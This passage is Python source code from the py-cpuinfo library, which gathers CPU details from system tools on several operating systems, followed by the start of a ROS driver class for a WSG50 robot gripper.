if returncode != 0:
g_trace.fail('Failed to run lscpu. Skipping ...')
return {}
info = {}
new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
if new_hz:
new_hz = _to_decimal_string(new_hz)
scale = 6
info['hz_advertised_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_advertised'] = _hz_short_to_full(new_hz, scale)
info['hz_actual'] = _hz_short_to_full(new_hz, scale)
new_hz = _get_field(False, output, None, None, 'CPU dynamic MHz', 'CPU static MHz')
if new_hz:
new_hz = _to_decimal_string(new_hz)
scale = 6
info['hz_advertised_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_advertised'] = _hz_short_to_full(new_hz, scale)
info['hz_actual'] = _hz_short_to_full(new_hz, scale)
vendor_id = _get_field(False, output, None, None, 'Vendor ID')
if vendor_id:
info['vendor_id_raw'] = vendor_id
brand = _get_field(False, output, None, None, 'Model name')
if brand:
info['brand_raw'] = brand
else:
brand = _get_field(False, output, None, None, 'Model')
if brand and not brand.isdigit():
info['brand_raw'] = brand
family = _get_field(False, output, None, None, 'CPU family')
if family and family.isdigit():
info['family'] = int(family)
stepping = _get_field(False, output, None, None, 'Stepping')
if stepping and stepping.isdigit():
info['stepping'] = int(stepping)
model = _get_field(False, output, None, None, 'Model')
if model and model.isdigit():
info['model'] = int(model)
l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
if l1_data_cache_size:
info['l1_data_cache_size'] = _friendly_bytes_to_int(l1_data_cache_size)
l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
if l1_instruction_cache_size:
info['l1_instruction_cache_size'] = _friendly_bytes_to_int(l1_instruction_cache_size)
l2_cache_size = _get_field(False, output, None, None, 'L2 cache', 'L2d cache')
if l2_cache_size:
info['l2_cache_size'] = _friendly_bytes_to_int(l2_cache_size)
l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
if l3_cache_size:
info['l3_cache_size'] = _friendly_bytes_to_int(l3_cache_size)
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features', 'ASEs implemented')
if flags:
flags = flags.split()
flags.sort()
info['flags'] = flags
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_dmesg():
'''
Returns the CPU info gathered from dmesg.
Returns {} if dmesg is not found or does not have the desired info.
'''
	g_trace.header('Trying to get info from dmesg ...')
# Just return {} if this arch has an unreliable dmesg log
arch, bits = _parse_arch(DataSource.arch_string_raw)
if arch in ['S390X']:
g_trace.fail('Running on S390X. Skipping ...')
return {}
# Just return {} if there is no dmesg
if not DataSource.has_dmesg():
g_trace.fail('Failed to find dmesg. Skipping ...')
return {}
# If dmesg fails return {}
returncode, output = DataSource.dmesg_a()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"dmesg -a\". Skipping ...')
return {}
info = _parse_dmesg_output(output)
g_trace.success()
return info
# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
'''
Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.
'''
	g_trace.header('Trying to get info from lsprop ...')
try:
# Just return {} if there is no lsprop
if not DataSource.has_ibm_pa_features():
g_trace.fail('Failed to find lsprop. Skipping ...')
return {}
# If ibm,pa-features fails return {}
returncode, output = DataSource.ibm_pa_features()
if output == None or returncode != 0:
g_trace.fail('Failed to glob /proc/device-tree/cpus/*/ibm,pa-features. Skipping ...')
return {}
# Filter out invalid characters from output
value = output.split("ibm,pa-features")[1].lower()
		value = [s for s in value if s in list('0123456789abcdef')]
value = ''.join(value)
# Get data converted to Uint32 chunks
left = int(value[0 : 8], 16)
right = int(value[8 : 16], 16)
# Get the CPU flags
flags = {
# Byte 0
'mmu' : _is_bit_set(left, 0),
'fpu' : _is_bit_set(left, 1),
'slb' : _is_bit_set(left, 2),
'run' : _is_bit_set(left, 3),
#'reserved' : _is_bit_set(left, 4),
'dabr' : _is_bit_set(left, 5),
'ne' : _is_bit_set(left, 6),
'wtr' : _is_bit_set(left, 7),
# Byte 1
'mcr' : _is_bit_set(left, 8),
'dsisr' : _is_bit_set(left, 9),
'lp' : _is_bit_set(left, 10),
'ri' : _is_bit_set(left, 11),
'dabrx' : _is_bit_set(left, 12),
'sprg3' : _is_bit_set(left, 13),
'rislb' : _is_bit_set(left, 14),
'pp' : _is_bit_set(left, 15),
# Byte 2
'vpm' : _is_bit_set(left, 16),
'dss_2.05' : _is_bit_set(left, 17),
#'reserved' : _is_bit_set(left, 18),
'dar' : _is_bit_set(left, 19),
#'reserved' : _is_bit_set(left, 20),
'ppr' : _is_bit_set(left, 21),
'dss_2.02' : _is_bit_set(left, 22),
'dss_2.06' : _is_bit_set(left, 23),
# Byte 3
'lsd_in_dscr' : _is_bit_set(left, 24),
'ugr_in_dscr' : _is_bit_set(left, 25),
#'reserved' : _is_bit_set(left, 26),
#'reserved' : _is_bit_set(left, 27),
#'reserved' : _is_bit_set(left, 28),
#'reserved' : _is_bit_set(left, 29),
#'reserved' : _is_bit_set(left, 30),
#'reserved' : _is_bit_set(left, 31),
# Byte 4
'sso_2.06' : _is_bit_set(right, 0),
#'reserved' : _is_bit_set(right, 1),
#'reserved' : _is_bit_set(right, 2),
#'reserved' : _is_bit_set(right, 3),
#'reserved' : _is_bit_set(right, 4),
#'reserved' : _is_bit_set(right, 5),
#'reserved' : _is_bit_set(right, 6),
#'reserved' : _is_bit_set(right, 7),
# Byte 5
'le' : _is_bit_set(right, 8),
'cfar' : _is_bit_set(right, 9),
'eb' : _is_bit_set(right, 10),
'lsq_2.07' : _is_bit_set(right, 11),
#'reserved' : _is_bit_set(right, 12),
#'reserved' : _is_bit_set(right, 13),
#'reserved' : _is_bit_set(right, 14),
#'reserved' : _is_bit_set(right, 15),
# Byte 6
'dss_2.07' : _is_bit_set(right, 16),
#'reserved' : _is_bit_set(right, 17),
#'reserved' : _is_bit_set(right, 18),
#'reserved' : _is_bit_set(right, 19),
#'reserved' : _is_bit_set(right, 20),
#'reserved' : _is_bit_set(right, 21),
#'reserved' : _is_bit_set(right, 22),
#'reserved' : _is_bit_set(right, 23),
# Byte 7
#'reserved' : _is_bit_set(right, 24),
#'reserved' : _is_bit_set(right, 25),
#'reserved' : _is_bit_set(right, 26),
#'reserved' : _is_bit_set(right, 27),
#'reserved' : _is_bit_set(right, 28),
#'reserved' : _is_bit_set(right, 29),
#'reserved' : _is_bit_set(right, 30),
#'reserved' : _is_bit_set(right, 31),
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_cat_var_run_dmesg_boot():
'''
Returns the CPU info gathered from /var/run/dmesg.boot.
Returns {} if dmesg is not found or does not have the desired info.
'''
	g_trace.header('Trying to get info from the /var/run/dmesg.boot log ...')
# Just return {} if there is no /var/run/dmesg.boot
if not DataSource.has_var_run_dmesg_boot():
g_trace.fail('Failed to find /var/run/dmesg.boot file. Skipping ...')
return {}
# If dmesg.boot fails return {}
returncode, output = DataSource.cat_var_run_dmesg_boot()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"cat /var/run/dmesg.boot\". Skipping ...')
return {}
info = _parse_dmesg_output(output)
g_trace.success()
return info
def _get_cpu_info_from_sysctl():
'''
Returns the CPU info gathered from sysctl.
Returns {} if sysctl is not found.
'''
	g_trace.header('Trying to get info from sysctl ...')
try:
# Just return {} if there is no sysctl
if not DataSource.has_sysctl():
g_trace.fail('Failed to find sysctl. Skipping ...')
return {}
# If sysctl fails return {}
returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"sysctl machdep.cpu hw.cpufrequency\". Skipping ...')
return {}
# Various fields
vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
cache_size = _get_field(False, output, int, 0, 'machdep.cpu.cache.size')
stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
model = _get_field(False, output, int, 0, 'machdep.cpu.model')
family = _get_field(False, output, int, 0, 'machdep.cpu.family')
# Flags
flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
hz_actual = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'l2_cache_size' : int(cache_size) * 1024,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_sysinfo():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
info = _get_cpu_info_from_sysinfo_v1()
info.update(_get_cpu_info_from_sysinfo_v2())
return info
def _get_cpu_info_from_sysinfo_v1():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
	g_trace.header('Trying to get info from sysinfo version 1 ...')
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
g_trace.fail('Failed to find sysinfo. Skipping ...')
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"sysinfo -cpu\". Skipping ...')
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0].strip()
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
model = int(output.split(', model ')[1].split(',')[0].strip())
family = int(output.split(', family ')[1].split(',')[0].strip())
# Flags
flags = []
for line in output.split('\n'):
if line.startswith('\t\t'):
for flag in line.strip().lower().split():
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, scale),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_sysinfo_v2():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
	g_trace.header('Trying to get info from sysinfo version 2 ...')
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
g_trace.fail('Failed to find sysinfo. Skipping ...')
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"sysinfo -cpu\". Skipping ...')
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0].strip()
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
signature = output.split('Signature:')[1].split('\n')[0].strip()
#
stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
model = int(signature.split('model ')[1].split(',')[0].strip())
family = int(signature.split('family ')[1].split(',')[0].strip())
# Flags
def get_subsection_flags(output):
retval = []
for line in output.split('\n')[1:]:
if not line.startswith(' ') and not line.startswith(' '): break
for entry in line.strip().lower().split(' '):
retval.append(entry)
return retval
flags = get_subsection_flags(output.split('Features: ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
flags.sort()
# Convert from GHz/MHz string to Hz
lines = [n for n in output.split('\n') if n]
raw_hz = lines[0].split('running at ')[1].strip().lower()
hz_advertised = raw_hz.rstrip('mhz').rstrip('ghz').strip()
hz_advertised = _to_decimal_string(hz_advertised)
hz_actual = hz_advertised
scale = 0
if raw_hz.endswith('mhz'):
scale = 6
elif raw_hz.endswith('ghz'):
scale = 9
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, scale),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_wmic():
'''
Returns the CPU info gathered from WMI.
Returns {} if not on Windows, or wmic is not installed.
'''
	g_trace.header('Trying to get info from wmic ...')
try:
# Just return {} if not Windows or there is no wmic
if not DataSource.is_windows or not DataSource.has_wmic():
g_trace.fail('Failed to find WMIC, or not on Windows. Skipping ...')
return {}
returncode, output = DataSource.wmic_cpu()
if output == None or returncode != 0:
g_trace.fail('Failed to run wmic. Skipping ...')
return {}
		# Break the output into key/value pairs
value = output.split("\n")
value = [s.rstrip().split('=') for s in value if '=' in s]
value = {k: v for k, v in value if v}
# Get the advertised MHz
processor_brand = value.get('Name')
hz_advertised, scale_advertised = _parse_cpu_brand_string(processor_brand)
# Get the actual MHz
hz_actual = value.get('CurrentClockSpeed')
scale_actual = 6
if hz_actual:
hz_actual = _to_decimal_string(hz_actual)
# Get cache sizes
l2_cache_size = value.get('L2CacheSize') # NOTE: L2CacheSize is in kilobytes
if l2_cache_size:
l2_cache_size = int(l2_cache_size) * 1024
l3_cache_size = value.get('L3CacheSize') # NOTE: L3CacheSize is in kilobytes
if l3_cache_size:
l3_cache_size = int(l3_cache_size) * 1024
# Get family, model, and stepping
family, model, stepping = '', '', ''
description = value.get('Description') or value.get('Caption')
entries = description.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'vendor_id_raw' : value.get('Manufacturer'),
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale_advertised),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale_actual),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale_advertised),
'hz_actual' : _hz_short_to_full(hz_actual, scale_actual),
'l2_cache_size' : l2_cache_size,
'l3_cache_size' : l3_cache_size,
'stepping' : stepping,
'model' : model,
'family' : family,
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_registry():
'''
Returns the CPU info gathered from the Windows Registry.
Returns {} if not on Windows.
'''
g_trace.header('Trying to get info from Windows registry ...')
try:
# Just return {} if not on Windows
if not DataSource.is_windows:
g_trace.fail('Not running on Windows. Skipping ...')
return {}
# Get the CPU name
processor_brand = DataSource.winreg_processor_brand().strip()
# Get the CPU vendor id
vendor_id = DataSource.winreg_vendor_id_raw()
# Get the CPU arch and bits
arch_string_raw = DataSource.winreg_arch_string_raw()
arch, bits = _parse_arch(arch_string_raw)
# Get the actual CPU Hz
hz_actual = DataSource.winreg_hz_actual()
hz_actual = _to_decimal_string(hz_actual)
# Get the advertised CPU Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
# If advertised hz not found, use the actual hz
if hz_advertised == '0.0':
scale = 6
hz_advertised = _to_decimal_string(hz_actual)
# Get the CPU features
feature_bits = DataSource.winreg_feature_bits()
def is_set(bit):
mask = 0x80000000 >> bit
retval = mask & feature_bits > 0
return retval
# http://en.wikipedia.org/wiki/CPUID
# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
flags = {
'fpu' : is_set(0), # Floating Point Unit
'vme' : is_set(1), # V86 Mode Extensions
'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
'msr' : is_set(5), # Model Specific Registers
'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
'mce' : is_set(7), # Machine Check Exception supported
'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
'sepamd' : is_set(10), # Fast system calls (AMD only)
'sep' : is_set(11), # Fast system calls
'mtrr' : is_set(12), # Memory Type Range Registers
'pge' : is_set(13), # Page Global Enable
'mca' : is_set(14), # Machine Check Architecture
'cmov' : is_set(15), # Conditional MOVe instructions
'pat' : is_set(16), # Page Attribute Table
'pse36' : is_set(17), # 36 bit Page Size Extensions
'serial' : is_set(18), # Processor Serial Number
'clflush' : is_set(19), # Cache Flush
#'reserved1' : is_set(20), # reserved
'dts' : is_set(21), # Debug Trace Store
'acpi' : is_set(22), # ACPI support
'mmx' : is_set(23), # MultiMedia Extensions
'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
'sse' : is_set(25), # SSE instructions
'sse2' : is_set(26), # SSE2 (WNI) instructions
'ss' : is_set(27), # self snoop
#'reserved2' : is_set(28), # reserved
'tm' : is_set(29), # Automatic clock control
'ia64' : is_set(30), # IA64 instructions
'3dnow' : is_set(31) # 3DNow! instructions available
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 6),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 6),
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_kstat():
'''
Returns the CPU info gathered from isainfo and kstat.
Returns {} if isainfo or kstat are not found.
'''
g_trace.header('Trying to get info from kstat ...')
try:
# Just return {} if there is no isainfo or kstat
if not DataSource.has_isainfo() or not DataSource.has_kstat():
g_trace.fail('Failed to find isainfo or kstat. Skipping ...')
return {}
# If isainfo fails return {}
returncode, flag_output = DataSource.isainfo_vb()
if flag_output == None or returncode != 0:
g_trace.fail('Failed to run \"isainfo -vb\". Skipping ...')
return {}
# If kstat fails return {}
returncode, kstat = DataSource.kstat_m_cpu_info()
if kstat == None or returncode != 0:
g_trace.fail('Failed to run \"kstat -m cpu_info\". Skipping ...')
return {}
# Various fields
vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())
# Flags
flags = flag_output.strip().split('\n')[-1].strip().lower().split()
flags.sort()
# Convert from GHz/MHz string to Hz
scale = 6
hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
hz_advertised = _to_decimal_string(hz_advertised)
# Convert from GHz/MHz string to Hz
hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
hz_actual = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_platform_uname():
g_trace.header('Trying to get info from platform.uname ...')
try:
uname = DataSource.uname_string_raw.split(',')[0]
family, model, stepping = (None, None, None)
entries = uname.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'family' : family,
'model' : model,
'stepping' : stepping
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_internal():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns {} if nothing is found.
'''
g_trace.write('!' * 80)
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)
info = {
'python_version' : PYTHON_VERSION,
'cpuinfo_version' : CPUINFO_VERSION,
'cpuinfo_version_string' : CPUINFO_VERSION_STRING,
'arch' : arch,
'bits' : bits,
'count' : DataSource.cpu_count,
'arch_string_raw' : DataSource.arch_string_raw,
}
g_trace.write("python_version: {0}".format(info['python_version']))
g_trace.write("cpuinfo_version: {0}".format(info['cpuinfo_version']))
g_trace.write("arch: {0}".format(info['arch']))
g_trace.write("bits: {0}".format(info['bits']))
g_trace.write("count: {0}".format(info['count']))
g_trace.write("arch_string_raw: {0}".format(info['arch_string_raw']))
# Try the Windows wmic
_copy_new_fields(info, _get_cpu_info_from_wmic())
# Try the Windows registry
_copy_new_fields(info, _get_cpu_info_from_registry())
# Try /proc/cpuinfo
_copy_new_fields(info, _get_cpu_info_from_proc_cpuinfo())
# Try cpufreq-info
_copy_new_fields(info, _get_cpu_info_from_cpufreq_info())
# Try LSCPU
_copy_new_fields(info, _get_cpu_info_from_lscpu())
# Try sysctl
_copy_new_fields(info, _get_cpu_info_from_sysctl())
# Try kstat
_copy_new_fields(info, _get_cpu_info_from_kstat())
# Try dmesg
_copy_new_fields(info, _get_cpu_info_from_dmesg())
# Try /var/run/dmesg.boot
_copy_new_fields(info, _get_cpu_info_from_cat_var_run_dmesg_boot())
# Try lsprop ibm,pa-features
_copy_new_fields(info, _get_cpu_info_from_ibm_pa_features())
# Try sysinfo
_copy_new_fields(info, _get_cpu_info_from_sysinfo())
# Try querying the CPU cpuid register
# FIXME: This should print stdout and stderr to trace log
_copy_new_fields(info, _get_cpu_info_from_cpuid())
# Try platform.uname
_copy_new_fields(info, _get_cpu_info_from_platform_uname())
g_trace.write('!' * 80)
return info
def get_cpu_info_json():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns the result in a json string
'''
import json
output = None
# If running under pyinstaller, run normally
if getattr(sys, 'frozen', False):
info = _get_cpu_info_internal()
output = json.dumps(info)
output = "{0}".format(output)
# If not running under pyinstaller, run in another process.
# This is done because multiprocessing has a design flaw that
# causes non-main programs to run multiple times on Windows.
else:
from subprocess import Popen, PIPE
command = [sys.executable, __file__, '--json']
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
output = p1.communicate()[0]
if p1.returncode != 0:
return "{}"
if not IS_PY2:
output = output.decode(encoding='UTF-8')
return output
def get_cpu_info():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns the result in a dict
'''
import json
output = get_cpu_info_json()
# Convert JSON to Python with non unicode strings
output = json.loads(output, object_hook = _utf_to_str)
return output
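# Usage sketch (not part of the library itself): get_cpu_info() returns a plain
# dict, and which keys are present depends on which data sources succeed on the
# current machine, so read fields defensively with .get().
#
#     info = get_cpu_info()
#     print(info.get('brand_raw', ''), info.get('hz_advertised_friendly', ''))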
def main():
from argparse import ArgumentParser
import json
# Parse args
parser = ArgumentParser(description='Gets CPU info with pure Python 2 & 3')
parser.add_argument('--json', action='store_true', help='Return the info in JSON format')
parser.add_argument('--version', action='store_true', help='Return the version of py-cpuinfo')
parser.add_argument('--trace', action='store_true', help='Traces code paths used to find CPU info to file')
args = parser.parse_args()
global g_trace
g_trace = Trace(args.trace, False)
try:
_check_arch()
except Exception as err:
sys.stderr.write(str(err) + "\n")
sys.exit(1)
info = _get_cpu_info_internal()
if not info:
sys.stderr.write("Failed to find cpu info\n")
sys.exit(1)
if args.json:
print(json.dumps(info))
elif args.version:
print(CPUINFO_VERSION_STRING)
else:
print('Python Version: {0}'.format(info.get('python_version', '')))
print('Cpuinfo Version: {0}'.format(info.get('cpuinfo_version_string', '')))
print('Vendor ID Raw: {0}'.format(info.get('vendor_id_raw', '')))
print('Hardware Raw: {0}'.format(info.get('hardware_raw', '')))
print('Brand Raw: {0}'.format(info.get('brand_raw', '')))
print('Hz Advertised Friendly: {0}'.format(info.get('hz_advertised_friendly', '')))
print('Hz Actual Friendly: {0}'.format(info.get('hz_actual_friendly', '')))
print('Hz Advertised: {0}'.format(info.get('hz_advertised', '')))
print('Hz Actual: {0}'.format(info.get('hz_actual', '')))
print('Arch: {0}'.format(info.get('arch', '')))
print('Bits: {0}'.format(info.get('bits', '')))
print('Count: {0}'.format(info.get('count', '')))
print('Arch String Raw: {0}'.format(info.get('arch_string_raw', '')))
print('L1 Data Cache Size: {0}'.format(info.get('l1_data_cache_size', '')))
print('L1 Instruction Cache Size: {0}'.format(info.get('l1_instruction_cache_size', '')))
print('L2 Cache Size: {0}'.format(info.get('l2_cache_size', '')))
print('L2 Cache Line Size: {0}'.format(info.get('l2_cache_line_size', '')))
print('L2 Cache Associativity: {0}'.format(info.get('l2_cache_associativity', '')))
print('L3 Cache Size: {0}'.format(info.get('l3_cache_size', '')))
print('Stepping: {0}'.format(info.get('stepping', '')))
print('Model: {0}'.format(info.get('model', '')))
print('Family: {0}'.format(info.get('family', '')))
print('Processor Type: {0}'.format(info.get('processor_type', '')))
print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
if __name__ == '__main__':
main()
else:
g_trace = Trace(False, False)
_check_arch()
|
wsg50_gripper.py
|
import rospy
from wsg_50_common.msg import Cmd, Status
from visual_mpc.envs.robot_envs import GripperInterface
import logging
from threading import Semaphore, Lock, Thread
import time
import numpy as np
GRIPPER_CLOSE = 6 # chosen so that gripper closes entirely without pushing against itself
GRIPPER_OPEN = 96 # chosen so that gripper opens entirely without pushing against outer rail
ROS_NODE_TIMEOUT = 600 # kill script if waiting for more than 10 minutes on gripper
MAX_TIMEOUT = 10
class WSG50Gripper(GripperInterface):
def __init__(self):
super(WSG50Gripper, self).__init__()
self.max_release = 0
self.sem_list = [Semaphore(value = 0)]
self._status_mutex = Lock()
self._desired_gpos = GRIPPER_OPEN
self._gripper_speed = 300
self._force_counter = 0
self._integrate_gripper_force, self._last_integrate = 0., None
self._last_status_t = time.time()
self.num_timeouts = 0
self.gripper_pub = rospy.Publisher('/wsg_50_driver/goal_position', Cmd, queue_size=10)
rospy.Subscriber("/wsg_50_driver/status", Status, self._gripper_callback)
logging.getLogger('robot_logger').info("waiting for first status")
self.sem_list[0].acquire()
logging.getLogger('robot_logger').info('gripper initialized!')
self._bg = Thread(target=self._background_monitor)
self._bg.start()
def _background_monitor(self):
while True:
self._status_mutex.acquire()
if len(self.sem_list) > 0 and time.time() - self._last_status_t >= ROS_NODE_TIMEOUT:
logging.getLogger('robot_logger').error('No gripper messages in {} seconds, maybe the node crashed?'.format(ROS_NODE_TIMEOUT))
self.clean_shutdown()
self._status_mutex.release()
time.sleep(30)
def get_gripper_state(self, integrate_force=False):
self._status_mutex.acquire()
cum_force, cntr = self._integrate_gripper_force, self._force_counter
width, force = self._gripper_width, self._gripper_force
self._integrate_gripper_force = 0.
self._force_counter = 0
self._status_mutex.release()
if integrate_force and cntr > 0:
logging.getLogger('robot_logger').debug("integrating with {} readings, cumulative force: {}".format(cntr, cum_force))
self._last_integrate = cum_force / cntr
return width, self._last_integrate
elif integrate_force and self._last_integrate is not None:
return width, self._last_integrate
return width, force
def get_gripper_limits(self):
return self.GRIPPER_CLOSE, self.GRIPPER_OPEN
def _set_gripper(self, command_pos, wait=False):
self._status_mutex.acquire()
self._desired_gpos = command_pos
if wait:
if self.num_timeouts > MAX_TIMEOUT:
